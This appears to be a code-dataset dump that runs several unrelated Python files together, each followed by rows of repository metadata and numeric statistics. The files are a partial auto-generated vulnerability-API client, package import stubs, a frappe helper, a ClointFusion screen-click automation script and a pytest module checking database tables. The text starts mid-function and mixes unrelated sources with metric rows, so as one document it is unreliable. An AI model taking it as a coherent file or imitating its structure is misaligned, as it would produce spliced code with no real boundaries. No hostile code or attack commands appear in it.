header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerabilities/{id}/references', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageOfVulnerabilityReference', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_vulnerability_solutions(self, id, **kwargs): # noqa: E501
"""Vulnerability Solutions # noqa: E501
Returns all solutions (across all platforms) that may be used to remediate this vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_solutions(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:return: ReferencesWithSolutionNaturalIDLink
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_solutions_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_solutions_with_http_info(id, **kwargs) # noqa: E501
return data
def get_vulnerability_solutions_with_http_info(self, id, **kwargs): # noqa: E501
"""Vulnerability Solutions # noqa: E501
Returns all solutions (across all platforms) that may be used to remediate this vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_solutions_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:return: ReferencesWithSolutionNaturalIDLink
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability_solutions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_vulnerability_solutions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerabilities/{id}/solutions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReferencesWithSolutionNaturalIDLink', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 41.701804 | 220 | 0.615526 | 11,983 | 104,046 | 5.129266 | 0.020362 | 0.053755 | 0.021866 | 0.028114 | 0.985032 | 0.983616 | 0.98059 | 0.978003 | 0.977043 | 0.971268 | 0 | 0.017741 | 0.293562 | 104,046 | 2,494 | 221 | 41.718524 | 0.818481 | 0.365579 | 0 | 0.847068 | 1 | 0 | 0.179925 | 0.069374 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036377 | false | 0 | 0.00297 | 0 | 0.093541 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
60fcfa268ddd1c34f63166d26be572ed9a648ae7 | 327 | py | Python | TrainInfoProcess/src/infoExtract/__init__.py | ZhuYing-CSU/PassengerTransportationDesign | d676ec0ac635ee73ede4d5276670b493c0c9ee15 | [
"MIT"
] | 1 | 2021-07-24T02:05:01.000Z | 2021-07-24T02:05:01.000Z | TrainInfoProcess/src/infoExtract/__init__.py | ZhuYing-CSU/PassengerTransportationDesign | d676ec0ac635ee73ede4d5276670b493c0c9ee15 | [
"MIT"
] | null | null | null | TrainInfoProcess/src/infoExtract/__init__.py | ZhuYing-CSU/PassengerTransportationDesign | d676ec0ac635ee73ede4d5276670b493c0c9ee15 | [
"MIT"
] | null | null | null | from TrainInfoProcess.src.infoExtract.AvgStopTime import calcAvgStopTime
from TrainInfoProcess.src.infoExtract.AvgTravelTime import calcAvgTravelTime
from TrainInfoProcess.src.infoExtract.AvgTravelSpeed import calcAvgTravelSpeed
from TrainInfoProcess.src.infoExtract.TrainNumberInfosExtraction import TrainNumberInfosExtraction | 81.75 | 98 | 0.917431 | 28 | 327 | 10.714286 | 0.428571 | 0.266667 | 0.306667 | 0.453333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045872 | 327 | 4 | 98 | 81.75 | 0.961538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
716afeaa2a7bc4928cd43415a023bedc18913687 | 208 | py | Python | docker_monitor/checks/__init__.py | cfpb/docker-monitor | b2073fcf79816744b3d3915b410f105b72b29f54 | [
"CC0-1.0"
] | 1 | 2021-07-14T02:36:43.000Z | 2021-07-14T02:36:43.000Z | docker_monitor/checks/__init__.py | cfpb/docker-monitor | b2073fcf79816744b3d3915b410f105b72b29f54 | [
"CC0-1.0"
] | null | null | null | docker_monitor/checks/__init__.py | cfpb/docker-monitor | b2073fcf79816744b3d3915b410f105b72b29f54 | [
"CC0-1.0"
] | 1 | 2021-02-18T11:38:52.000Z | 2021-02-18T11:38:52.000Z | # noqa: F401
from docker_monitor.checks.active_build import ActiveBuildCheck
from docker_monitor.checks.prisma_scan import PrismaScanCheck
from docker_monitor.checks.running_as_root import RunningAsRootCheck
| 41.6 | 68 | 0.889423 | 27 | 208 | 6.592593 | 0.62963 | 0.168539 | 0.286517 | 0.38764 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015544 | 0.072115 | 208 | 4 | 69 | 52 | 0.906736 | 0.048077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
716c03e94cc0e92b04db8362e50f551c6521489f | 117 | py | Python | dashboard_z/www/api.py | Lewinta/Dashboard_z | 1d65e7ec866ae8b48bf5a6bf2b3096de92fc8ad2 | [
"MIT"
] | null | null | null | dashboard_z/www/api.py | Lewinta/Dashboard_z | 1d65e7ec866ae8b48bf5a6bf2b3096de92fc8ad2 | [
"MIT"
] | null | null | null | dashboard_z/www/api.py | Lewinta/Dashboard_z | 1d65e7ec866ae8b48bf5a6bf2b3096de92fc8ad2 | [
"MIT"
] | null | null | null | import frappe
def get_physician_id(physician):
return frappe.get_value("Physician", {"user_id": physician}, "name") | 29.25 | 69 | 0.769231 | 16 | 117 | 5.375 | 0.625 | 0.255814 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08547 | 117 | 4 | 69 | 29.25 | 0.803738 | 0 | 0 | 0 | 0 | 0 | 0.169492 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
71a20576299f10bfb98c95e015afc430de7ea1d0 | 2,546 | py | Python | test_2021-01-08_09-15-33.py | ClointFusion-Community/CFC-Projects | c6381738ade07e6e8979bbae37400ec2b4e626c5 | [
"MIT"
] | null | null | null | test_2021-01-08_09-15-33.py | ClointFusion-Community/CFC-Projects | c6381738ade07e6e8979bbae37400ec2b4e626c5 | [
"MIT"
] | null | null | null | test_2021-01-08_09-15-33.py | ClointFusion-Community/CFC-Projects | c6381738ade07e6e8979bbae37400ec2b4e626c5 | [
"MIT"
] | null | null | null | # This code is generated automatically by ClointFusion BOT Builder Tool.
import ClointFusion as cf
import time
cf.window_show_desktop()
cf.mouse_click(int(cf.pg.size()[0]/2),int(cf.pg.size()[1]/2))
try:
cf.mouse_click(*cf.mouse_search_snip_return_coordinates_x_y(r'C:\Users\Karth\AppData\Local\Temp\cf_log_2dm66eov_generator\Images\Snips\1--566_853.png',conf=0.7, wait=12),left_or_right='right', single_double_triple = 'single')
except:
cf.mouse_click(566,853,left_or_right='right', single_double_triple = 'single')
time.sleep(2)
try:
cf.mouse_click(*cf.mouse_search_snip_return_coordinates_x_y(r'C:\Users\Karth\AppData\Local\Temp\cf_log_2dm66eov_generator\Images\Snips\2--672_603.png',conf=0.7, wait=14),left_or_right='left', single_double_triple = 'single')
except:
cf.mouse_click(672,603,left_or_right='left', single_double_triple = 'single')
time.sleep(4)
try:
cf.mouse_click(*cf.mouse_search_snip_return_coordinates_x_y(r'C:\Users\Karth\AppData\Local\Temp\cf_log_2dm66eov_generator\Images\Snips\3--316_1059.png',conf=0.7, wait=11),left_or_right='left', single_double_triple = 'single')
except:
cf.mouse_click(316,1059,left_or_right='left', single_double_triple = 'single')
time.sleep(1)
cf.key_write_enter('chr',key='')
time.sleep(1)
cf.key_press('enter')
time.sleep(3)
try:
cf.mouse_click(*cf.mouse_search_snip_return_coordinates_x_y(r'C:\Users\Karth\AppData\Local\Temp\cf_log_2dm66eov_generator\Images\Snips\4-NewTabGoogleChrome-551_94.png',conf=0.7, wait=10),left_or_right='left', single_double_triple = 'single')
except:
cf.mouse_click(551,94,left_or_right='left', single_double_triple = 'single')
time.sleep(0)
try:
cf.mouse_click(*cf.mouse_search_snip_return_coordinates_x_y(r'C:\Users\Karth\AppData\Local\Temp\cf_log_2dm66eov_generator\Images\Snips\5-NewTabGoogleChrome-551_94.png',conf=0.7, wait=11),left_or_right='left', single_double_triple = 'double')
except:
cf.mouse_click(551,94,left_or_right='left', single_double_triple = 'double')
time.sleep(1)
cf.key_write_enter('goo',key='')
time.sleep(1)
cf.key_press('right')
time.sleep(0)
cf.key_press('enter')
time.sleep(5)
try:
cf.mouse_click(*cf.mouse_search_snip_return_coordinates_x_y(r'C:\Users\Karth\AppData\Local\Temp\cf_log_2dm66eov_generator\Images\Snips\6-GoogleGoogleChrome-1919_0.png',conf=0.7, wait=10),left_or_right='left', single_double_triple = 'single')
except:
cf.mouse_click(1919,0,left_or_right='left', single_double_triple = 'single')
time.sleep(0)
cf.window_close_windows('Google - Google Chrome') | 42.433333 | 245 | 0.779262 | 438 | 2,546 | 4.228311 | 0.194064 | 0.071814 | 0.084233 | 0.12959 | 0.845572 | 0.831533 | 0.806156 | 0.759179 | 0.674946 | 0.674946 | 0 | 0.055111 | 0.066379 | 2,546 | 60 | 246 | 42.433333 | 0.724022 | 0.027494 | 0 | 0.466667 | 1 | 0.133333 | 0.298586 | 0.231919 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.044444 | 0 | 0.044444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
71a31d2893445d70ed230439bf822b73cc7d0c88 | 36,668 | py | Python | tests/test_all.py | KonnexionsGmbH/dcr | 3b58be5df66831e5389558599cf1d234da605aeb | [
"CNRI-Python",
"Naumen",
"Condor-1.1",
"MS-PL"
] | 2 | 2022-02-24T15:13:23.000Z | 2022-03-28T00:45:31.000Z | tests/test_all.py | KonnexionsGmbH/dcr | 3b58be5df66831e5389558599cf1d234da605aeb | [
"CNRI-Python",
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | tests/test_all.py | KonnexionsGmbH/dcr | 3b58be5df66831e5389558599cf1d234da605aeb | [
"CNRI-Python",
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | # pylint: disable=unused-argument
"""Testing Module all."""
import cfg.cls_setup
import cfg.glob
import db.cls_action
import db.cls_db_core
import db.cls_document
import db.cls_language
import db.cls_run
import db.cls_token
import db.cls_version
import pytest
import utils
import dcr
# -----------------------------------------------------------------------------
# Constants & Globals.
# -----------------------------------------------------------------------------
# pylint: disable=C0302
# pylint: disable=W0212
# @pytest.mark.issue
# -----------------------------------------------------------------------------
# Check the database content.
# -----------------------------------------------------------------------------
def check_db_content() -> None: # pylint: disable=R0915
"""Check the database content."""
cfg.glob.db_core = db.cls_db_core.DBCore()
check_db_content_action()
check_db_content_document()
check_db_content_language()
check_db_content_run()
check_db_content_version()
# -----------------------------------------------------------------------------
# Database table language.
# -----------------------------------------------------------------------------
pytest.helpers.check_dbt_language(
(
1,
(
1,
True,
"eng",
"en",
"en_core_web_trf",
"eng",
utils.get_os_independent_name("data/inbox_test"),
"English",
),
)
)
pytest.helpers.check_dbt_language(
(
2,
(
2,
True,
"deu",
"de",
"de_dep_news_trf",
"deu",
utils.get_os_independent_name("data\\inbox_test\\deutsch"),
"Deutsch",
),
)
)
pytest.helpers.check_dbt_language((3, (3, False, "fra", "fr", "fr_dep_news_trf", "fra", "", "French")))
pytest.helpers.check_dbt_language((4, (4, False, "ita", "it", "it_core_news_lg", "ita", "", "Italian")))
# -----------------------------------------------------------------------------
# Database table run.
# -----------------------------------------------------------------------------
pytest.helpers.check_dbt_run((1, (1, "p_i", "inbox (preprocessor)", 1, "end", 1, 5, 6)))
pytest.helpers.check_dbt_run((2, (2, "p_2_i", "pdf2image (preprocessor)", 1, "end", 0, 2, 2)))
pytest.helpers.check_dbt_run((3, (3, "ocr", "tesseract (preprocessor)", 1, "end", 0, 0, 4)))
pytest.helpers.check_dbt_run((4, (4, "pypdf2", "pypdf2 (preprocessor)", 1, "end", 0, 1, 1)))
pytest.helpers.check_dbt_run((5, (5, "n_2_p", "pandoc (preprocessor)", 1, "end", 0, 1, 1)))
pytest.helpers.check_dbt_run((6, (6, "tet", "pdflib (nlp)", 1, "end", 0, 5, 5)))
pytest.helpers.check_dbt_run((7, (7, "s_p_j", "parser (nlp)", 1, "end", 0, 5, 5)))
pytest.helpers.check_dbt_run((8, (8, "tkn", "tokenize (nlp)", 1, "end", 0, 5, 5)))
# -----------------------------------------------------------------------------
# Database table version.
# -----------------------------------------------------------------------------
pytest.helpers.check_dbt_version((1, (1, cfg.cls_setup.Setup.DCR_VERSION)))
# -----------------------------------------------------------------------------
# Check the database content - database table action.
# -----------------------------------------------------------------------------
def check_db_content_action() -> None: # pylint: disable=R0915
"""Check the database content - database table action."""
pytest.helpers.check_dbt_action(
(
1,
(
1,
"p_i",
"inbox (preprocessor)",
utils.get_os_independent_name("data/inbox_test"),
"inbox",
"",
"",
0,
"docx_ok.docx",
1,
1,
1,
0,
-1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
2,
(
2,
"n_2_p",
"pandoc (preprocessor)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"docx_ok_1.docx",
1,
2,
1,
0,
-1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
3,
(
3,
"p_i",
"inbox (preprocessor)",
utils.get_os_independent_name("data/inbox_test"),
"inbox",
"",
"",
0,
"jpeg_pdf_text_ok.jpeg",
2,
3,
1,
0,
-1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
4,
(
4,
"ocr",
"tesseract (preprocessor)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"jpeg_pdf_text_ok_2.jpeg",
2,
3,
1,
0,
-1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
5,
(
5,
"p_i",
"inbox (preprocessor)",
utils.get_os_independent_name("data/inbox_test"),
"inbox",
"",
"",
0,
"pdf_scanned_ok.pdf",
3,
5,
1,
0,
1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
6,
(
6,
"p_2_i",
"pdf2image (preprocessor)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"pdf_scanned_ok_3.pdf",
3,
5,
1,
1,
1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
7,
(
7,
"p_i",
"inbox (preprocessor)",
utils.get_os_independent_name("data/inbox_test"),
"inbox",
"",
"",
0,
"pdf_text_ok.pdf",
4,
7,
1,
0,
3,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
8,
(
8,
"tet",
"pdflib (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"pdf_text_ok_4.pdf",
4,
7,
1,
0,
3,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
9,
(
9,
"p_i",
"inbox (preprocessor)",
utils.get_os_independent_name("data/inbox_test"),
"inbox",
"No 'pdf' format",
"01.903 Issue (p_i): Runtime error with fitz.open() processing of "
+ "file 'pdf_wrong_format.pdf' - error: 'cannot open broken document'.",
1,
"pdf_wrong_format.pdf",
5,
9,
1,
0,
-1,
"error",
),
)
)
pytest.helpers.check_dbt_action(
(
10,
(
10,
"p_i",
"inbox (preprocessor)",
utils.get_os_independent_name("data/inbox_test"),
"inbox",
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02.pdf",
6,
10,
1,
0,
2,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
11,
(
11,
"p_2_i",
"pdf2image (preprocessor)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02_6.pdf",
6,
10,
1,
2,
2,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
12,
(
12,
"ocr",
"tesseract (preprocessor)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"pdf_scanned_ok_3_1.jpeg",
3,
6,
2,
0,
-1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
13,
(
13,
"ocr",
"tesseract (preprocessor)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02_6_1.jpeg",
6,
11,
2,
0,
-1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
14,
(
14,
"ocr",
"tesseract (preprocessor)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02_6_2.jpeg",
6,
11,
2,
0,
-1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
15,
(
15,
"tet",
"pdflib (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"jpeg_pdf_text_ok_2.pdf",
2,
4,
3,
0,
1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
16,
(
16,
"tet",
"pdflib (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"pdf_scanned_ok_3_1.pdf",
3,
12,
3,
0,
1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
17,
(
17,
"tet",
"pdflib (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02_6_1.pdf",
6,
13,
3,
0,
1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
18,
(
18,
"tet",
"pdflib (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02_6_2.pdf",
6,
14,
3,
0,
1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
19,
(
19,
"pypdf2",
"pypdf2 (preprocessor)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02_6_0.pdf",
6,
13,
3,
0,
2,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
20,
(
20,
"tet",
"pdflib (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02_6_0.pdf",
6,
19,
4,
0,
2,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
21,
(
21,
"tet",
"pdflib (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"docx_ok_1.pdf",
1,
2,
5,
0,
2,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
22,
(
22,
"s_p_j_line",
"parser_line (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"pdf_text_ok_4.line.xml",
4,
8,
6,
0,
3,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
23,
(
23,
"s_p_j_line",
"parser_line (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"jpeg_pdf_text_ok_2.line.xml",
2,
15,
6,
0,
1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
24,
(
24,
"s_p_j_line",
"parser_line (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"pdf_scanned_ok_3_1.line.xml",
3,
16,
6,
0,
1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
25,
(
25,
"s_p_j_line",
"parser_line (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02_6_0.line.xml",
6,
20,
6,
0,
2,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
26,
(
26,
"s_p_j_line",
"parser_line (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"docx_ok_1.line.xml",
1,
21,
6,
0,
2,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
27,
(
27,
"tkn",
"tokenize (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"pdf_text_ok_4.line.json",
4,
22,
7,
0,
3,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
28,
(
28,
"tkn",
"tokenize (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"jpeg_pdf_text_ok_2.line.json",
2,
23,
7,
0,
1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
29,
(
29,
"tkn",
"tokenize (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"pdf_scanned_ok_3_1.line.json",
3,
24,
7,
0,
1,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
30,
(
30,
"tkn",
"tokenize (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02_6_0.line.json",
6,
25,
7,
0,
2,
"end",
),
)
)
pytest.helpers.check_dbt_action(
(
31,
(
31,
"tkn",
"tokenize (nlp)",
utils.get_os_independent_name("data/inbox_test_accepted"),
"inbox_accepted",
"",
"",
0,
"docx_ok_1.line.json",
1,
26,
7,
0,
2,
"end",
),
)
)
# -----------------------------------------------------------------------------
# Check the database content - database table document.
# -----------------------------------------------------------------------------
def check_db_content_document() -> None: # pylint: disable=R0915
"""Check the database content - database table document."""
pytest.helpers.check_dbt_document(
(
1,
(
1,
"tkn",
"tokenize (nlp)",
utils.get_os_independent_name("data\\inbox_test"),
"",
"",
0,
"docx_ok.docx",
1,
8,
-1,
"end",
),
)
)
pytest.helpers.check_dbt_document(
(
2,
(
2,
"tkn",
"tokenize (nlp)",
utils.get_os_independent_name("data\\inbox_test"),
"",
"",
0,
"jpeg_pdf_text_ok.jpeg",
1,
8,
-1,
"end",
),
)
)
pytest.helpers.check_dbt_document(
(
3,
(
3,
"tkn",
"tokenize (nlp)",
utils.get_os_independent_name("data\\inbox_test"),
"",
"",
0,
"pdf_scanned_ok.pdf",
1,
8,
1,
"end",
),
)
)
pytest.helpers.check_dbt_document(
(
4,
(
4,
"tkn",
"tokenize (nlp)",
utils.get_os_independent_name("data\\inbox_test"),
"",
"",
0,
"pdf_text_ok.pdf",
1,
8,
3,
"end",
),
)
)
pytest.helpers.check_dbt_document(
(
5,
(
5,
"p_i",
"inbox (preprocessor)",
utils.get_os_independent_name("data\\inbox_test"),
"No 'pdf' format",
"01.903 Issue (p_i): Runtime error with fitz.open() processing of "
+ "file 'pdf_wrong_format.pdf' - error: 'cannot open broken document'.",
1,
"pdf_wrong_format.pdf",
1,
1,
-1,
"error",
),
)
)
pytest.helpers.check_dbt_document(
(
6,
(
6,
"tkn",
"tokenize (nlp)",
utils.get_os_independent_name("data\\inbox_test"),
"",
"",
0,
"translating_sql_into_relational_algebra_p01_02.pdf",
1,
8,
2,
"end",
),
)
)
# -----------------------------------------------------------------------------
# Check the database content - database table language.
# -----------------------------------------------------------------------------
def check_db_content_language() -> None: # pylint: disable=R0915
"""Check the database content - database table language."""
pytest.helpers.check_dbt_language(
(
1,
(
1,
True,
"eng",
"en",
"en_core_web_trf",
"eng",
utils.get_os_independent_name("data/inbox_test"),
"English",
),
)
)
pytest.helpers.check_dbt_language(
(
2,
(
2,
True,
"deu",
"de",
"de_dep_news_trf",
"deu",
utils.get_os_independent_name("data\\inbox_test\\deutsch"),
"Deutsch",
),
)
)
pytest.helpers.check_dbt_language((3, (3, False, "fra", "fr", "fr_dep_news_trf", "fra", "", "French")))
pytest.helpers.check_dbt_language((4, (4, False, "ita", "it", "it_core_news_lg", "ita", "", "Italian")))
# -----------------------------------------------------------------------------
# Check the database content- database table run.
# -----------------------------------------------------------------------------
def check_db_content_run() -> None: # pylint: disable=R0915
"""Check the database content- database table run."""
pytest.helpers.check_dbt_run((1, (1, "p_i", "inbox (preprocessor)", 1, "end", 1, 5, 6)))
pytest.helpers.check_dbt_run((2, (2, "p_2_i", "pdf2image (preprocessor)", 1, "end", 0, 2, 2)))
pytest.helpers.check_dbt_run((3, (3, "ocr", "tesseract (preprocessor)", 1, "end", 0, 0, 4)))
pytest.helpers.check_dbt_run((4, (4, "pypdf2", "pypdf2 (preprocessor)", 1, "end", 0, 1, 1)))
pytest.helpers.check_dbt_run((5, (5, "n_2_p", "pandoc (preprocessor)", 1, "end", 0, 1, 1)))
pytest.helpers.check_dbt_run((6, (6, "tet", "pdflib (nlp)", 1, "end", 0, 5, 5)))
pytest.helpers.check_dbt_run((7, (7, "s_p_j", "parser (nlp)", 1, "end", 0, 5, 5)))
pytest.helpers.check_dbt_run((8, (8, "tkn", "tokenize (nlp)", 1, "end", 0, 5, 5)))
# -----------------------------------------------------------------------------
# Check the database content - database table version.
# -----------------------------------------------------------------------------
def check_db_content_version() -> None: # pylint: disable=R0915
"""Check the database content - database table version."""
pytest.helpers.check_dbt_version((1, (1, cfg.cls_setup.Setup.DCR_VERSION)))
# -----------------------------------------------------------------------------
# Test RUN_ACTION_PROCESS_ALL_COMPLETE - delete_auxiliary_files = true.
# -----------------------------------------------------------------------------
def test_run_action_process_all_complete_auxiliary_deleted(fxtr_setup_empty_db_and_inbox):
"""Test RUN_ACTION_PROCESS_ALL_COMPLETE - delete_auxiliary_files = true."""
cfg.glob.logger.debug(cfg.glob.LOGGER_START)
# -------------------------------------------------------------------------
pytest.helpers.copy_files_4_pytest_2_dir(
source_files=[
("docx_ok", "docx"),
("jpeg_pdf_text_ok", "jpeg"),
("pdf_scanned_ok", "pdf"),
("pdf_text_ok", "pdf"),
("pdf_wrong_format", "pdf"),
("README", "md"),
("translating_sql_into_relational_algebra_p01_02", "pdf"),
],
target_path=cfg.glob.setup.directory_inbox,
)
# -------------------------------------------------------------------------
db.cls_run.Run.ID_RUN_UMBRELLA = 0
dcr.main([dcr.DCR_ARGV_0, db.cls_run.Run.ACTION_CODE_ALL_COMPLETE])
# -------------------------------------------------------------------------
cfg.glob.logger.info("=========> test_run_action_process_all_complete_auxiliary_deleted <=========")
check_db_content()
pytest.helpers.verify_content_of_inboxes(
inbox=(
[],
["README.md"],
),
inbox_accepted=(
[],
[
"docx_ok_1.docx",
"jpeg_pdf_text_ok_2.jpeg",
"pdf_scanned_ok_3.pdf",
"pdf_text_ok_4.pdf",
"translating_sql_into_relational_algebra_p01_02_6.pdf",
],
),
inbox_rejected=(
[],
["pdf_wrong_format_5.pdf"],
),
)
# -----------------------------------------------------------------------------
# Test RUN_ACTION_PROCESS_ALL_COMPLETE - empty.
